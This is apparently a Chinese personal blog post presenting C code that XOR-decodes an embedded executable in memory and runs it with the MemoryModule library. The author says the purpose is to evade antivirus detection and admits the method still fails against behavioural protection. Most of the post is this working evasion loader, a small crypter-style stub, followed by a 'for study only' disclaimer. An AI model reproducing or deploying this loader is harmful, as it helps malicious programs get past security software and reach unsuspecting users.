1. 首页
  2. 日记

XOR加密后内存加载PE绕过杀毒软件2.0

之前那个MEMPE因为年代比较久远,并不支持win7 64位系统。

闲着无聊逛看雪论坛,看到一份类似的代码,声称支持EXE和DLL内存加载。

然后到github上找到了源。就是这里:https://github.com/fancycode/MemoryModule

结合我之前写的方法:https://github.com/eric21/MemPE

使用方法超级简单:

#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <malloc.h>
#include "MemoryModule.h"
#include "res\a.h"
int RunForAarray(void)
{
	HMEMORYMODULE handle;
	int result = -1;
	for (int i = 0; i < sizeof(aArray); i++)
	{
		//szArray[i] = ~ szArray[i]; // 取反 ~
		aArray[i] = aArray[i] ^ 123; // 异或 ^
	}
	handle = MemoryLoadLibrary(aArray);
	if (handle == NULL)
	{
		_tprintf(_T("Can't load library from memory.\n"));
		goto exit;
	}
	result = MemoryCallEntryPoint(handle);
	if (result < 0) {
		_tprintf(_T("Could not execute entry point: %d\n"), result);
	}
	MemoryFreeLibrary(handle);

exit:
	if (aArray)
		free(aArray);
	return result;
}
int main(int argc, char* argv[])
{
    return RunForAarray();
}

兼容win7以上的系统,包括64位系统。需要注意:依然过不了主动防御惹~
重要说明:仅供学习交流,请勿用于非法用途!

评分 0, 满分 5 星
0
0
看完收藏一下,下次也能找得到
  • 版权声明:本文基于《知识共享署名-相同方式共享 3.0 中国大陆许可协议》发布,转载请遵循本协议
  • 文章链接:http://www.eric21.com/2015/09/23/360 [复制] (转载时请注明本文出处及文章链接)
  • 本文无相关文章
上一篇:
:下一篇

发表评论

gravatar

沙发空缺中,还不快抢~

00:00/00:00